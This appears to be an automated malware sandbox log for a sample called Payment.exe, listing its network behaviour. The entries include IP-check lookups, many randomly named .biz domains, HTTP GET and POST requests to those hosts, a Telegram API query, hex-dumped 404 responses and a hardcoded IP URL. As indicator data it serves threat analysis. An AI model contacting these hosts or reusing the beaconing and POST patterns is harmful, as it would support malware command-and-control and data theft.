Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ccoms?usid=27&utid=12022910001 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /qvxayygldfupog?usid=27&utid=12022910102 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /wjuw?usid=27&utid=12022910910 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: www.anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz

Source: unknown

HTTP traffic detected: POST /uoiag HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Apr 2025 16:09:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Apr 2025 16:10:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:28 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:32 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 10 Apr 2025 16:11:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 10 Apr 2025 16:11:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 10 Apr 2025 16:11:49 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 10 Apr 2025 16:11:49 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/msbflok
